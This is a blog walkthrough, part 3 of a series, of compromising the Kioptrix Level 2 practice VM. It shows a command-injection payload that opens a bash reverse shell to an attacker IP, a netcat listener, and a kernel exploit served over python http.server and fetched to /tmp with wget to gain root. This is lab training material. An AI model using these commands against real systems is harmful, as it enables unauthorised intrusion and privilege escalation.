NepCodeX

Byte Musings: Where Tech Meets Curiosity


Hacking Kioptrix Level 2 (#1.1) – Part 3 – Shell access

image 9

In the previous post, we bypassed the login using SQL injection. Now, we want to exploit the feature of the application to open a reverse shell. This can be done in other ways as well.

Here, I will be listen on port 4444 in my attacker machine (192.168.19.132, since I have installed newer version of kali linux on my VMWare, I have got new IP for it).

nc -nlvp 4444
image

Now, from where we left in the previous post, we will be on the following screen.

127.0.0.1 && bash -i >& /dev/tcp/192.168.19.132/4444 0>&1
image 1

This would give us a reverse shell.

image 2

Local Privilege Escalation

As we can see in the shell that is spawned, we are not the root user. Doing some research, we can find that the kernel being used is prone to local privilege escalation. You can prepend /usr/share/exploitdb/exploits/ before the path shown in the screenshot below to get a file.

searchsploit linux kernel 2.6 local privilege
image 3

Now, we should find a way to inject the file in the target machine. So, for that let’s serve a folder from the attacker machine. One easy way is to create a simple python webserver (I would be using python3).

mkdir codes
cd codes
python3 -m http.server 8080
image 4

Now, we can copy the file to be sent to the target machine where we can compile and run it.

image 5

Let’s check if our web server is working or not by entering the attacker’s IP address alongside the port in the browser.

image 6

Up to now, our server is running and we have hosted the exploit in our server.

Sending the exploit to the target machine

Now in the reverse shell, we can use wget or curl command to get the file into the target machine.

image 7

However, we got the permission denied message. So, let’s try to see the permissions of the root folders.

ls -al /
image 9

As we can see above, we have write access for users other than the owner which is root. So, let’s change our directory to /tmp and try to download the exploit.

cd /tmp
wget 192.168.19.132:8080/9479.c
image 10

It’s a success. Now, let’s compile and run the code.

image 12

Since you have a root access, you can go further as you want.



0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments